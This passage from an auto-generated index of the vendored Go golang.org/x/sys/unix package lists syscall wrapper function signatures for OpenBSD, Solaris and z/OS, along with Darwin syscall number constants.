int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_solaris_amd64.go function pipe (line 434) | func pipe(p *[2]_C_int) (n int, err error) { function pipe2 (line 445) | func pipe2(p *[2]_C_int, flags int) (err error) { function getsockname (line 455) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Getcwd (line 465) | func Getcwd(buf []byte) (n int, err error) { function getgroups (line 480) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 491) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 501) | func wait4(pid int32, statusp *_C_int, options int, rusage *Rusage) (wpi... function gethostname (line 512) | func gethostname(buf []byte) (n int, err error) { function utimes (line 527) | func utimes(path string, times *[2]Timeval) (err error) { function utimensat (line 542) | func utimensat(fd int, path string, times *[2]Timespec, flag int) (err e... function fcntl (line 557) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function futimesat (line 568) | func futimesat(fildes int, path *byte, times *[2]Timeval) (err error) { function accept (line 578) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function recvmsg (line 589) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 600) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function acct (line 611) | func acct(path *byte) (err error) { function __makedev (line 621) | func __makedev(version int, major uint, minor uint) (val uint64) { function __major (line 629) | func __major(version int, dev uint64) (val uint) { function __minor (line 637) | func __minor(version int, dev uint64) (val uint) { function ioctlRet (line 645) | func ioctlRet(fd int, req int, arg uintptr) (ret int, err error) { function ioctlPtrRet (line 656) | func ioctlPtrRet(fd int, req int, arg unsafe.Pointer) (ret int, err erro... function poll (line 667) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Access (line 678) | func Access(path string, mode uint32) (err error) { function Adjtime (line 693) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 703) | func Chdir(path string) (err error) { function Chmod (line 718) | func Chmod(path string, mode uint32) (err error) { function Chown (line 733) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 748) | func Chroot(path string) (err error) { function ClockGettime (line 763) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 773) | func Close(fd int) (err error) { function Creat (line 783) | func Creat(path string, mode uint32) (fd int, err error) { function Dup (line 799) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 810) | func Dup2(oldfd int, newfd int) (err error) { function Exit (line 820) | func Exit(code int) { function Faccessat (line 827) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 842) | func Fchdir(fd int) (err error) { function Fchmod (line 852) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 862) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 877) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 887) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fdatasync (line 902) | func Fdatasync(fd int) (err error) { function Flock (line 912) | func Flock(fd int, how int) (err error) { function Fpathconf (line 922) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 933) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 943) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatvfs (line 958) | func Fstatvfs(fd int, vfsstat *Statvfs_t) (err error) { function Getdents (line 968) | func Getdents(fd int, buf []byte, basep *uintptr) (n int, err error) { function Getgid (line 983) | func Getgid() (gid int) { function Getpid (line 991) | func Getpid() (pid int) { function Getpgid (line 999) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1010) | func Getpgrp() (pgid int, err error) { function Geteuid (line 1021) | func Geteuid() (euid int) { function Getegid (line 1029) | func Getegid() (egid int) { function Getppid (line 1037) | func Getppid() (ppid int) { function Getpriority (line 1045) | func Getpriority(which int, who int) (n int, err error) { function Getrlimit (line 1056) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1066) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1076) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1087) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1097) | func Getuid() (uid int) { function Kill (line 1105) | func Kill(pid int, signum syscall.Signal) (err error) { function Lchown (line 1115) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1130) | func Link(path string, link string) (err error) { function Listen (line 1150) | func Listen(s int, backlog int) (err error) { function Lstat (line 1160) | func Lstat(path string, stat *Stat_t) (err error) { function Madvise (line 1175) | func Madvise(b []byte, advice int) (err error) { function Mkdir (line 1189) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1204) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1219) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1234) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1249) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1264) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Mlock (line 1279) | func Mlock(b []byte) (err error) { function Mlockall (line 1293) | func Mlockall(flags int) (err error) { function Mprotect (line 1303) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 1317) | func Msync(b []byte, flags int) (err error) { function Munlock (line 1331) | func Munlock(b []byte) (err error) { function Munlockall (line 1345) | func Munlockall() (err error) { function Nanosleep (line 1355) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1365) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1381) | func Openat(dirfd int, path string, flags int, mode uint32) (fd int, err... function Pathconf (line 1397) | func Pathconf(path string, name int) (val int, err error) { function Pause (line 1413) | func Pause() (err error) { function pread (line 1423) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1438) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1453) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1468) | func Readlink(path string, buf []byte) (n int, err error) { function Rename (line 1488) | func Rename(from string, to string) (err error) { function Renameat (line 1508) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Rmdir (line 1528) | func Rmdir(path string) (err error) { function Seek (line 1543) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1554) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1565) | func Setegid(egid int) (err error) { function Seteuid (line 1575) | func Seteuid(euid int) (err error) { function Setgid (line 1585) | func Setgid(gid int) (err error) { function Sethostname (line 1595) | func Sethostname(p []byte) (err error) { function Setpgid (line 1609) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1619) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1629) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1639) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1649) | func Setsid() (pid int, err error) { function Setuid (line 1660) | func Setuid(uid int) (err error) { function Shutdown (line 1670) | func Shutdown(s int, how int) (err error) { function Stat (line 1680) | func Stat(path string, stat *Stat_t) (err error) { function Statvfs (line 1695) | func Statvfs(path string, vfsstat *Statvfs_t) (err error) { function Symlink (line 1710) | func Symlink(path string, link string) (err error) { function Sync (line 1730) | func Sync() (err error) { function Sysconf (line 1740) | func Sysconf(which int) (n int64, err error) { function Times (line 1751) | func Times(tms *Tms) (ticks uintptr, err error) { function Truncate (line 1762) | func Truncate(path string, length int64) (err error) { function Fsync (line 1777) | func Fsync(fd int) (err error) { function Ftruncate (line 1787) | func Ftruncate(fd int, length int64) (err error) { function Umask (line 1797) | func Umask(mask int) (oldmask int) { function Uname (line 1805) | func Uname(buf *Utsname) (err error) { function Unmount (line 1815) | func Unmount(target string, flags int) (err error) { function Unlink (line 1830) | func Unlink(path string) (err error) { function Unlinkat (line 1845) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Ustat (line 1860) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function Utime (line 1870) | func Utime(path string, buf *Utimbuf) (err error) { function bind (line 1885) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 1895) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function mmap (line 1905) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1916) | func munmap(addr uintptr, length uintptr) (err error) { function sendfile (line 1926) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function sendto (line 1937) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function socket (line 1951) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 1962) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function write (line 1972) | func write(fd int, p []byte) (n int, err error) { function getsockopt (line 1987) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function getpeername (line 1997) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function setsockopt (line 2007) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function recvfrom (line 2017) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function port_create (line 2032) | func port_create() (n int, err error) { function port_associate (line 2043) | func port_associate(port int, source int, object uintptr, events int, us... function port_dissociate (line 2054) | func port_dissociate(port int, source int, object uintptr) (n int, err e... function port_get (line 2065) | func port_get(port int, pe *portEvent, timeout *Timespec) (n int, err er... function port_getn (line 2076) | func port_getn(port int, pe *portEvent, max uint32, nget *uint32, timeou... function putmsg (line 2087) | func putmsg(fd int, clptr *strbuf, dataptr *strbuf, flags int) (err erro... function getmsg (line 2097) | func getmsg(fd int, clptr *strbuf, dataptr *strbuf, flags *int) (err err... FILE: vendor/golang.org/x/sys/unix/zsyscall_zos_s390x.go function fcntl (line 14) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function read (line 25) | func read(fd int, p []byte) (n int, err error) { function write (line 42) | func write(fd int, p []byte) (n int, err error) { function accept (line 59) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 70) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 80) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 90) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 101) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 111) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 121) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 131) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 142) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 152) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 162) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 172) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 189) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 205) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 216) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 227) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 238) | func munmap(addr uintptr, length uintptr) (err error) { function ioctl (line 248) | func ioctl(fd int, req int, arg uintptr) (err error) { function ioctlPtr (line 258) | func ioctlPtr(fd int, req int, arg unsafe.Pointer) (err error) { function Access (line 268) | func Access(path string, mode uint32) (err error) { function Chdir (line 283) | func Chdir(path string) (err error) { function Chown (line 298) | func Chown(path string, uid int, gid int) (err error) { function Chmod (line 313) | func Chmod(path string, mode uint32) (err error) { function Creat (line 328) | func Creat(path string, mode uint32) (fd int, err error) { function Dup (line 344) | func Dup(oldfd int) (fd int, err error) { function Dup2 (line 355) | func Dup2(oldfd int, newfd int) (err error) { function Errno2 (line 365) | func Errno2() (er2 int) { function Err2ad (line 373) | func Err2ad() (eadd *int) { function Exit (line 381) | func Exit(code int) { function Fchdir (line 388) | func Fchdir(fd int) (err error) { function Fchmod (line 398) | func Fchmod(fd int, mode uint32) (err error) { function Fchown (line 408) | func Fchown(fd int, uid int, gid int) (err error) { function FcntlInt (line 418) | func FcntlInt(fd uintptr, cmd int, arg int) (retval int, err error) { function fstat (line 429) | func fstat(fd int, stat *Stat_LE_t) (err error) { function Fstatvfs (line 439) | func Fstatvfs(fd int, stat *Statvfs_t) (err error) { function Fsync (line 449) | func Fsync(fd int) (err error) { function Ftruncate (line 459) | func Ftruncate(fd int, length int64) (err error) { function Getpagesize (line 469) | func Getpagesize() (pgsize int) { function Mprotect (line 477) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 493) | func Msync(b []byte, flags int) (err error) { function Poll (line 509) | func Poll(fds []PollFd, timeout int) (n int, err error) { function Times (line 526) | func Times(tms *Tms) (ticks uintptr, err error) { function W_Getmntent (line 537) | func W_Getmntent(buff *byte, size int) (lastsys int, err error) { function W_Getmntent_A (line 548) | func W_Getmntent_A(buff *byte, size int) (lastsys int, err error) { function mount_LE (line 559) | func mount_LE(path string, filesystem string, fstype string, mtm uint32,... function unmount (line 589) | func unmount(filesystem string, mtm int) (err error) { function Chroot (line 604) | func Chroot(path string) (err error) { function Uname (line 619) | func Uname(buf *Utsname) (err error) { function Gethostname (line 629) | func Gethostname(buf []byte) (err error) { function Getegid (line 645) | func Getegid() (egid int) { function Geteuid (line 653) | func Geteuid() (uid int) { function Getgid (line 661) | func Getgid() (gid int) { function Getpid (line 669) | func Getpid() (pid int) { function Getpgid (line 677) | func Getpgid(pid int) (pgid int, err error) { function Getppid (line 688) | func Getppid() (pid int) { function Getpriority (line 696) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 707) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function getrusage (line 717) | func getrusage(who int, rusage *rusage_zos) (err error) { function Getsid (line 727) | func Getsid(pid int) (sid int, err error) { function Getuid (line 738) | func Getuid() (uid int) { function Kill (line 746) | func Kill(pid int, sig Signal) (err error) { function Lchown (line 756) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 771) | func Link(path string, link string) (err error) { function Listen (line 791) | func Listen(s int, n int) (err error) { function lstat (line 801) | func lstat(path string, stat *Stat_LE_t) (err error) { function Mkdir (line 816) | func Mkdir(path string, mode uint32) (err error) { function Mkfifo (line 831) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 846) | func Mknod(path string, mode uint32, dev int) (err error) { function Pread (line 861) | func Pread(fd int, p []byte, offset int64) (n int, err error) { function Pwrite (line 878) | func Pwrite(fd int, p []byte, offset int64) (n int, err error) { function Readlink (line 895) | func Readlink(path string, buf []byte) (n int, err error) { function Rename (line 917) | func Rename(from string, to string) (err error) { function Rmdir (line 937) | func Rmdir(path string) (err error) { function Seek (line 952) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function Setpriority (line 963) | func Setpriority(which int, who int, prio int) (err error) { function Setpgid (line 973) | func Setpgid(pid int, pgid int) (err error) { function Setrlimit (line 983) | func Setrlimit(resource int, lim *Rlimit) (err error) { function Setregid (line 993) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1003) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1013) | func Setsid() (pid int, err error) { function Setuid (line 1024) | func Setuid(uid int) (err error) { function Setgid (line 1034) | func Setgid(uid int) (err error) { function Shutdown (line 1044) | func Shutdown(fd int, how int) (err error) { function stat (line 1054) | func stat(path string, statLE *Stat_LE_t) (err error) { function Symlink (line 1069) | func Symlink(path string, link string) (err error) { function Sync (line 1089) | func Sync() { function Truncate (line 1096) | func Truncate(path string, length int64) (err error) { function Tcgetattr (line 1111) | func Tcgetattr(fildes int, termptr *Termios) (err error) { function Tcsetattr (line 1121) | func Tcsetattr(fildes int, when int, termptr *Termios) (err error) { function Umask (line 1131) | func Umask(mask int) (oldmask int) { function Unlink (line 1139) | func Unlink(path string) (err error) { function Utime (line 1154) | func Utime(path string, utim *Utimbuf) (err error) { function open (line 1169) | func open(path string, mode int, perm uint32) (fd int, err error) { function remove (line 1185) | func remove(path string) (err error) { function waitpid (line 1200) | func waitpid(pid int, wstatus *_C_int, options int) (wpid int, err error) { function gettimeofday (line 1211) | func gettimeofday(tv *timeval_zos) (err error) { function pipe (line 1221) | func pipe(p *[2]_C_int) (err error) { function utimes (line 1231) | func utimes(path string, timeval *[2]Timeval) (err error) { function Select (line 1246) | func Select(nmsgsfds int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval... FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_386.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_amd64.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_arm.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_arm64.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_mips64.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_ppc64.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysctl_openbsd_riscv64.go type mibentry (line 8) | type mibentry struct FILE: vendor/golang.org/x/sys/unix/zsysnum_darwin_amd64.go constant SYS_SYSCALL (line 10) | SYS_SYSCALL = 0 constant SYS_EXIT (line 11) | SYS_EXIT = 1 constant SYS_FORK (line 12) | SYS_FORK = 2 constant SYS_READ (line 13) | SYS_READ = 3 constant SYS_WRITE (line 14) | SYS_WRITE = 4 constant SYS_OPEN (line 15) | SYS_OPEN = 5 constant SYS_CLOSE (line 16) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 17) | SYS_WAIT4 = 7 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_CHDIR (line 20) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 21) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 22) | SYS_MKNOD = 14 constant SYS_CHMOD (line 23) | SYS_CHMOD = 15 constant SYS_CHOWN (line 24) | SYS_CHOWN = 16 constant SYS_GETFSSTAT (line 25) | SYS_GETFSSTAT = 18 constant SYS_GETPID (line 26) | SYS_GETPID = 20 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_PIPE (line 44) | SYS_PIPE = 42 constant SYS_GETEGID (line 45) | SYS_GETEGID = 43 constant SYS_SIGACTION (line 46) | SYS_SIGACTION = 46 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 48) | SYS_SIGPROCMASK = 48 constant SYS_GETLOGIN (line 49) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 50) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 51) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 52) | SYS_SIGPENDING = 52 constant SYS_SIGALTSTACK (line 53) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 54) | SYS_IOCTL = 54 constant SYS_REBOOT (line 55) | SYS_REBOOT = 55 constant SYS_REVOKE (line 56) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 57) | SYS_SYMLINK = 57 constant SYS_READLINK (line 58) | SYS_READLINK = 58 constant SYS_EXECVE (line 59) | SYS_EXECVE = 59 constant SYS_UMASK (line 60) | SYS_UMASK = 60 constant SYS_CHROOT (line 61) | SYS_CHROOT = 61 constant SYS_MSYNC (line 62) | SYS_MSYNC = 65 constant SYS_VFORK (line 63) | SYS_VFORK = 66 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_SIGSUSPEND (line 87) | SYS_SIGSUSPEND = 111 constant SYS_GETTIMEOFDAY (line 88) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 89) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 90) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 91) | SYS_READV = 120 constant SYS_WRITEV (line 92) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 93) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 94) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 95) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 96) | SYS_SETREUID = 126 constant SYS_SETREGID (line 97) | SYS_SETREGID = 127 constant SYS_RENAME (line 98) | SYS_RENAME = 128 constant SYS_FLOCK (line 99) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 100) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 101) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 102) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 103) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 104) | SYS_MKDIR = 136 constant SYS_RMDIR (line 105) | SYS_RMDIR = 137 constant SYS_UTIMES (line 106) | SYS_UTIMES = 138 constant SYS_FUTIMES (line 107) | SYS_FUTIMES = 139 constant SYS_ADJTIME (line 108) | SYS_ADJTIME = 140 constant SYS_GETHOSTUUID (line 109) | SYS_GETHOSTUUID = 142 constant SYS_SETSID (line 110) | SYS_SETSID = 147 constant SYS_GETPGID (line 111) | SYS_GETPGID = 151 constant SYS_SETPRIVEXEC (line 112) | SYS_SETPRIVEXEC = 152 constant SYS_PREAD (line 113) | SYS_PREAD = 153 constant SYS_PWRITE (line 114) | SYS_PWRITE = 154 constant SYS_NFSSVC (line 115) | SYS_NFSSVC = 155 constant SYS_STATFS (line 116) | SYS_STATFS = 157 constant SYS_FSTATFS (line 117) | SYS_FSTATFS = 158 constant SYS_UNMOUNT (line 118) | SYS_UNMOUNT = 159 constant SYS_GETFH (line 119) | SYS_GETFH = 161 constant SYS_QUOTACTL (line 120) | SYS_QUOTACTL = 165 constant SYS_MOUNT (line 121) | SYS_MOUNT = 167 constant SYS_CSOPS (line 122) | SYS_CSOPS = 169 constant SYS_CSOPS_AUDITTOKEN (line 123) | SYS_CSOPS_AUDITTOKEN = 170 constant SYS_WAITID (line 124) | SYS_WAITID = 173 constant SYS_KDEBUG_TYPEFILTER (line 125) | SYS_KDEBUG_TYPEFILTER = 177 constant SYS_KDEBUG_TRACE_STRING (line 126) | SYS_KDEBUG_TRACE_STRING = 178 constant SYS_KDEBUG_TRACE64 (line 127) | SYS_KDEBUG_TRACE64 = 179 constant SYS_KDEBUG_TRACE (line 128) | SYS_KDEBUG_TRACE = 180 constant SYS_SETGID (line 129) | SYS_SETGID = 181 constant SYS_SETEGID (line 130) | SYS_SETEGID = 182 constant SYS_SETEUID (line 131) | SYS_SETEUID = 183 constant SYS_SIGRETURN (line 132) | SYS_SIGRETURN = 184 constant SYS_THREAD_SELFCOUNTS (line 133) | SYS_THREAD_SELFCOUNTS = 186 constant SYS_FDATASYNC (line 134) | SYS_FDATASYNC = 187 constant SYS_STAT (line 135) | SYS_STAT = 188 constant SYS_FSTAT (line 136) | SYS_FSTAT = 189 constant SYS_LSTAT (line 137) | SYS_LSTAT = 190 constant SYS_PATHCONF (line 138) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 139) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 140) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 141) | SYS_SETRLIMIT = 195 constant SYS_GETDIRENTRIES (line 142) | SYS_GETDIRENTRIES = 196 constant SYS_MMAP (line 143) | SYS_MMAP = 197 constant SYS_LSEEK (line 144) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 145) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 146) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 147) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 148) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 149) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 150) | SYS_UNDELETE = 205 constant SYS_OPEN_DPROTECTED_NP (line 151) | SYS_OPEN_DPROTECTED_NP = 216 constant SYS_GETATTRLIST (line 152) | SYS_GETATTRLIST = 220 constant SYS_SETATTRLIST (line 153) | SYS_SETATTRLIST = 221 constant SYS_GETDIRENTRIESATTR (line 154) | SYS_GETDIRENTRIESATTR = 222 constant SYS_EXCHANGEDATA (line 155) | SYS_EXCHANGEDATA = 223 constant SYS_SEARCHFS (line 156) | SYS_SEARCHFS = 225 constant SYS_DELETE (line 157) | SYS_DELETE = 226 constant SYS_COPYFILE (line 158) 